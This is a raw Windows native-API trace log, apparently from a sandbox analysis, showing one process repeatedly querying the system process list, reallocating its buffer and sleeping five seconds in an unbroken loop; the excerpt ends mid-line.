[0251.434] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0251.435] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0251.435] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0251.435] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0251.438] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0251.439] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0251.441] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0251.441] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0251.442] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0251.442] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0251.442] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0251.446] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0251.446] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0251.448] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0251.448] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0251.449] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0251.449] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0251.450] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0251.453] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0251.454] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0251.455] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0251.456] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0251.456] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0251.457] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0251.457] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0251.460] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0251.461] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0251.463] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0251.463] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0251.464] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0251.464] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0251.464] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0251.468] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0251.469] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0251.470] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0251.471] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0251.471] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0251.472] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0251.472] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0251.475] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0251.476] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0251.477] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0251.477] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0251.478] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0251.478] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0251.478] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0251.482] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0251.483] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0251.485] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0251.485] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0251.485] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0251.486] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0251.486] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0251.489] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0251.490] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0251.493] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0251.493] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0251.494] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0251.494] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0251.494] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0251.498] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0251.499] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0251.500] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0251.501] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0251.501] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0251.502] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0251.502] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0251.507] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0251.508] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0251.509] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0251.509] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0251.510] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0251.510] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0251.510] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0251.514] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0251.514] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0251.516] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0251.516] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0251.517] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0251.517] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0251.517] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0251.520] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0251.521] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0251.522] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0251.522] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0251.523] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0251.523] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0251.523] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0251.527] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0251.527] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0251.530] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0251.530] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0251.530] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0251.532] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0251.532] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0251.535] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0251.536] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0251.538] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0251.538] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0251.538] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0251.539] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0251.539] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0251.542] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0251.543] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0251.544] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0251.544] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0251.545] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0251.545] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0251.545] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0251.550] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0251.551] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0251.552] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0251.552] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0251.553] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0251.554] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0251.554] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0251.557] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0251.558] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0251.559] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0251.559] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0251.560] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0251.560] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0251.560] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0251.565] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0251.566] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0251.568] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0251.568] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0251.568] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0251.569] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0251.569] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0251.572] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0251.573] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0251.574] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0251.574] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0251.575] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0251.575] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0251.575] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0251.579] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0251.580] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0251.583] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0251.583] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0251.583] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0251.583] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0251.584] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0251.587] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, 